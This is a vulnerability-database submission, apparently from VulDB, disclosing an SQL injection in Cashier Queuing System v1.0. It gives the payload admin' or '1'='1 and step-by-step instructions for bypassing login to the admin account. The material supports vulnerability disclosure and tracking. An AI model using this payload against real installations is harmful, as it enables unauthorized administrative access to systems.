| Title | Cashier Queuing System V1.0 - SQL Injection Leads to admin account |
|---|
| Description | # Exploit Title: Cashier Queuing System V1.0 - SQL Injection Leads to the admin account
# Exploit Author: Kshitij Rewandkar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15047/cashier-queuing-system-live-monitor-and-voice-notification-php-and-sqlite-free-source
# Software Link: https://www.sourcecodester.com/php/15047/cashier-queuing-system-live-monitor-and-voice-notification-php-and-sqlite-free-source
# Version: v1.0
# Tested on: Windows 11, Apache
Description: An SQL injection issue in Cashier Queuing System v.1.0 allows an attacker to log in to the admin account.
Vulnerable Parameters:
username
password
Payload:
admin' or '1'='1
Steps:
1) Go to the Login page:- http://localhost/queuing/login.php
2) Now in username and password we put our payload
Payload:- admin' or '1'='1
3) Now when you click submit you get logged in |
|---|
| Source | ⚠️ https://github.com/DisguisedRoot/Exploit/blob/main/SQLInj/POC |
|---|
| User | DisguisedRoot (UID 33702) |
|---|
| Submission | 10/17/2022 16:38 (4 years ago) |
|---|
| Moderation | 10/18/2022 11:28 (19 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 211186 [SourceCodester Cashier Queuing System 1.0 Login Page /queuing/login.php username/password sql injection] |
|---|
| Points | 20 |
|---|